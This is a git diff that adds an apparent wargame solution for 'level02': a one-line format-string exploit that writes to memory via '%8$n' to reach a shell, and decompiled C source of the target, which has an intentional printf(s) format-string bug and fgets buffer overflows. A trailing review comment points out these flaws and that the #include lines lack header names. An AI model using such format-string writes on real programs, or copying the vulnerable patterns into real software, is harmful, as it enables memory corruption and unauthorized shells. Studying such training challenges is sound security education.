diff --git a/level02/ressources/exploit b/level02/ressources/exploit
new file mode 100644
index 0000000..2f1fed9
--- /dev/null
+++ b/level02/ressources/exploit
@@ -0,0 +1 @@
+(python -c 'print("%4196997p" + "%8$n" + "\n" + "\x28\x12\x60")'; cat) | ./level02
diff --git a/level02/source.c b/level02/source.c
new file mode 100644
index 0000000..bac4bd4
--- /dev/null
+++ b/level02/source.c
@@ -0,0 +1,53 @@
+#include
+#include
+#include
+
+int main(void)
+{
+ char buff[96];
+ int v5;
+ char password[48];
+ char s[96]; // buffer located at the 28th element on the stack
+ int v8;
+ int len;
+ FILE *stream;
+
+ memset(s, 0, sizeof(s));
+ v8 = 0;
+ memset(password, 0, 41);
+ memset(buff, 0, sizeof(buff));
+ v5 = 0;
+ stream = 0;
+ len = 0;
+ stream = fopen("/home/users/level03/.pass", "r");
+ if (!stream) {
+ fwrite("ERROR: failed to open password file\n", 1, 36, stderr);
+ exit(1);
+ }
+ len = fread(password, 1, 41, stream);
+ password[strcspn(password, "\n")] = '\0';
+ if (len != 41) {
+ fwrite("ERROR: failed to read password file\n", 1, 36, stderr);
+ exit(1);
+ }
+ fclose(stream);
+ puts("===== [ Secure Access System v1.0 ] =====");
+ puts("/***************************************\\");
+ puts("| You must login to access this system. |");
+ puts("\\**************************************/");
+ printf("--[ Username: ");
+ fgets(s, 100, stdin);
+ s[strcspn(s, "\n")] = '\0';
+ printf("--[ Password: ");
+ fgets(buff, 100, stdin);
+ buff[strcspn(buff, "\n")] = '\0';
+ puts("*****************************************");
+ if (strncmp(password, buff, 41)) {
+ printf(s);
+ puts(" does not have access!");
+ exit(1);
+ }
+ printf("Greetings, %s!\n", s);
+ system("/bin/sh");
+ return 0;
+}
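Review bot: In `level02/source.c`, `printf(s);` in the failed-login branch passes the username read from stdin as the format string, so any conversion specifiers the user types are interpreted by printf while the password read from `.pass` is still in the same stack frame; in code meant to be safe this line is `printf("%s", s);`. The two `fgets(s, 100, stdin)` / `fgets(buff, 100, stdin)` calls also allow writes four bytes past the 96-byte arrays and would normally take `sizeof(s)` and `sizeof(buff)`. If this file is a faithful reconstruction of the challenge binary (the `v5`/`v8` names suggest decompiler output), the weaknesses presumably have to stay; in that case a header comment saying so, plus `/* intentional: user-controlled format string */` on the printf line, would keep it from being mistaken for reference code. The three `#include` lines show no header names here, which may be an extraction artifact, but as shown the file would not compile.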